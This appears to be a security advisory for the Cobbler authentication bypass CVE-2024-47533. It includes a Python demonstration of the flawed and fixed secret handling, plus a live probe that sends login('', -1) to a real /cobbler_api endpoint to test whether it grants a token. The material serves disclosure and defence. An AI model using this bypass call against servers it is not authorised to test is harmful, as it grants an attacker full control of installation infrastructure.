PT-2024-8393 · Cobbler, SUSE

Opoplawski · Published 2024-11-17 · Updated 2025-04-18 · CVE-2024-47533

CVSS v3.1: 10 Critical
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Note on the score: the vector as printed (scope unchanged, S:U) computes to a 9.8 base score under CVSS v3.1; a 10.0 requires a scope change (S:C). Either the score or the vector shown here is off by that one metric.
Name of the Vulnerable Software and Affected Versions
Cobbler versions 3.0.0 through 3.2.2
Cobbler versions 3.3.0 through 3.3.6

Description
Improper authentication in Cobbler, a Linux installation server. Anyone with network access to the Cobbler XML-RPC endpoint can gain full control of the server. The `utils.get_shared_secret()` function always returns -1, so the shared-secret login path accepts the XML-RPC call `login("", -1)`: an empty username with the integer -1 as the password. No credentials, user interaction or prior access are needed, and the resulting session can make any change to the server.

Recommendations
For Cobbler versions 3.0.0 through 3.2.2, update to version 3.2.3 or later. For Cobbler versions 3.3.0 through 3.3.6, update to version 3.3.7 or later. Until the update is applied, restrict access to the Cobbler XML-RPC endpoint (`/cobbler_api`) at the network or web-server layer to trusted hosts only; the bypass needs nothing more than the ability to reach that endpoint.
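The following is an added example, not Cobbler's own code. It models the failure mode the advisory describes: a secret reader that collapses every read error into the constant -1, and a login path that then accepts user "" with password -1. Beside it is a fail-closed reader and login that refuse when the secret is missing or when the password is not a string, and a probe that asks a live `/cobbler_api` endpoint whether `login("", -1)` hands out a token. The reader/login functions are simplified reconstructions (assumptions marked in the comments); only the endpoint path, the method name and the argument pair come from the advisory and Cobbler's public API.

```python
"""
Added example (not Cobbler's own code). Models the CVE-2024-47533 failure
mode: get_shared_secret() returns the constant -1 on any read failure, and
login() then accepts user "" with password -1. Shown beside a fail-closed
version and a live probe for the real XML-RPC endpoint.
"""
import hmac
import secrets
import tempfile
import xmlrpc.client

SECRET_FILE = "/var/lib/cobbler/web.ss"   # path cobblerd uses for the shared secret


class SecretUnavailable(Exception):
    """Raised by the fixed reader when the shared secret cannot be loaded."""


def get_shared_secret_vulnerable(path=SECRET_FILE):
    # Simplified reconstruction (assumption): every error is swallowed and the
    # caller gets -1. The advisory says the affected versions always returned
    # -1, so the "secret" compared at login was always the integer -1.
    try:
        with open(path, "r", encoding="utf-8") as fd:
            return fd.read().strip()
    except Exception:
        return -1


def get_shared_secret_fixed(path=SECRET_FILE):
    # Fail closed: a missing, unreadable or empty secret is an error, never a
    # default value that an attacker can guess.
    try:
        with open(path, "r", encoding="utf-8") as fd:
            value = fd.read().strip()
    except OSError as exc:
        raise SecretUnavailable(f"cannot read {path}: {exc}") from exc
    if not value:
        raise SecretUnavailable(f"{path} is empty")
    return value


def fixed_reader_refuses(path):
    """True if the fail-closed reader raises for this path (helper for checks)."""
    try:
        get_shared_secret_fixed(path)
    except SecretUnavailable:
        return True
    return False


def make_token():
    return secrets.token_hex(16)


def login_vulnerable(user, password, shared_secret):
    # Hypothetical simplified login: empty user + matching shared secret gives
    # a token. With shared_secret == -1, the XML-RPC <int>-1</int> compares equal.
    if user == "" and password == shared_secret:
        return make_token()
    return None


def login_fixed(user, password, shared_secret):
    # Both sides must be non-empty strings; the comparison is constant-time.
    if user != "":
        return None
    if not isinstance(password, str) or not isinstance(shared_secret, str):
        return None
    if not shared_secret or not hmac.compare_digest(password.encode(), shared_secret.encode()):
        return None
    return make_token()


def write_temp_secret():
    """Constructed fixture: a readable secret file; returns (path, secret)."""
    value = secrets.token_hex(32)
    tmp = tempfile.NamedTemporaryFile("w", delete=False, suffix=".ss")
    tmp.write(value + "\n")
    tmp.close()
    return tmp.name, value


def probe_cobbler(url):
    """
    Live check against a real server: True if the endpoint (for example
    "http://host/cobbler_api") hands out a token for login("", -1).
    Not exercised by the offline demo below.
    """
    proxy = xmlrpc.client.ServerProxy(url, allow_none=True)
    try:
        token = proxy.login("", -1)
    except (xmlrpc.client.Fault, OSError):
        return False
    return isinstance(token, str) and len(token) > 0


if __name__ == "__main__":
    missing = "/nonexistent/web.ss"   # stands in for the failed read
    secret = get_shared_secret_vulnerable(missing)
    print("vulnerable secret on read failure:", secret)
    print("vulnerable login('', -1) token:", login_vulnerable("", -1, secret))
    print("fixed reader refuses missing file:", fixed_reader_refuses(missing))
    print("fixed login('', -1) against a real secret:", login_fixed("", -1, write_temp_secret()[1]))
```

Run `probe_cobbler("http://<host>/cobbler_api")` only against servers you are authorised to test; a returned token means the instance is still on an affected version or has an equivalent misconfiguration, and should be treated as fully compromised-at-will until patched and network-restricted.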

Exploit

Fix

Weakness Enumeration

CWE-287 Improper Authentication

Related Identifiers

BDU:2024-09952
CVE-2024-47533
GHSA-M26C-FCGH-CP6H
OESA-2025-1411
OESA-2025-1412
OESA-2025-1413
OESA-2025-1414
OESA-2025-1435
OPENSUSE-SU-2024:0370-1
OPENSUSE-SU-2024:0382-1
OPENSUSE-SU-2024:14512-1
OPENSUSE-SU-2024_4007-1
SUSE-SU-2024:4006-1
SUSE-SU-2024:4007-1

Affected Products

Cobbler
SUSE